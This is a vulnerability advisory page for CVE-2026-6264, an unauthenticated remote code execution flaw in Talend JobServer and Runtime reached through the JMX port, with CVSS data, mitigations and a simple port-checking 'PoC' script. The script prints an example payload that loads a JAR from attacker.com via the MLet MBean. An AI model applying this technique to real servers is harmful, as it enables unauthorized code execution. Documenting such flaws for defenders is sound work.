Security Vulnerability Report
中文
CVE-2026-6264 CVSS 9.8 CRITICAL

CVE-2026-6264

Published: 2026-04-14 03:16:09
Last Modified: 2026-04-17 15:26:13
Source: 4ac701fe-44e9-4bcd-9585-dd6449257611

Description

A critical vulnerability in the Talend JobServer and Talend Runtime allows unauthenticated remote code execution via the JMX monitoring port. The attack vector is the JMX monitoring port of the Talend JobServer. The vulnerability can be mitigated for the Talend JobServer by requiring TLS client authentication for the monitoring port; however, the patch must be applied for full mitigation. For Talend ESB Runtime, the vulnerability can be mitigated by disabling the JobServer JMX monitoring port, which is disabled by default from the R2024-07-RT patch.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Talend JobServer < R2024-07-RT
Talend Runtime < R2024-07-RT

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys import socket # Conceptual PoC for CVE-2026-6264 # This script demonstrates the logic of interacting with a vulnerable JMX service. # Actual exploitation requires specific JMX/RMI libraries. def check_jmx_vulnerability(target_ip, port): print(f"[*] Checking {target_ip}:{port} for CVE-2026-6264...") try: # Attempt to connect to the JMX port (usually RMI) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) result = sock.connect_ex((target_ip, port)) sock.close() if result == 0: print(f"[+] Port {port} is open. Potential vulnerability detected.") print(f"[!] Next step: Use JMX console or custom RMI client to invoke MBean operations without auth.") print(f"[!] Example Payload: Invoke MLet MBean to load http://attacker.com/exploit.jar") else: print(f"[-] Port {port} is closed.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 3: print("Usage: python cve_2026_6264_poc.py <IP> <PORT>") else: check_jmx_vulnerability(sys.argv[1], int(sys.argv[2]))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6264", "sourceIdentifier": "4ac701fe-44e9-4bcd-9585-dd6449257611", "published": "2026-04-14T03:16:09.050", "lastModified": "2026-04-17T15:26:13.013", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A critical vulnerability in the Talend JobServer and Talend Runtime allows unauthenticated remote code execution via the JMX monitoring port. The attack vector is the JMX monitoring port of the Talend JobServer. The vulnerability can be mitigated for the Talend JobServer by requiring TLS client authentication for the monitoring port; however, the patch must be applied for full mitigation. For Talend ESB Runtime, the vulnerability can be mitigated by disabling the JobServer JMX monitoring port, which is disabled by default from the R2024-07-RT patch."}], "metrics": {"cvssMetricV31": [{"source": "4ac701fe-44e9-4bcd-9585-dd6449257611", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "references": [{"url": "https://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fix-for-the-Qlik-Talend-JobServer-and-Talend/tac-p/2541974", "source": "4ac701fe-44e9-4bcd-9585-dd6449257611"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.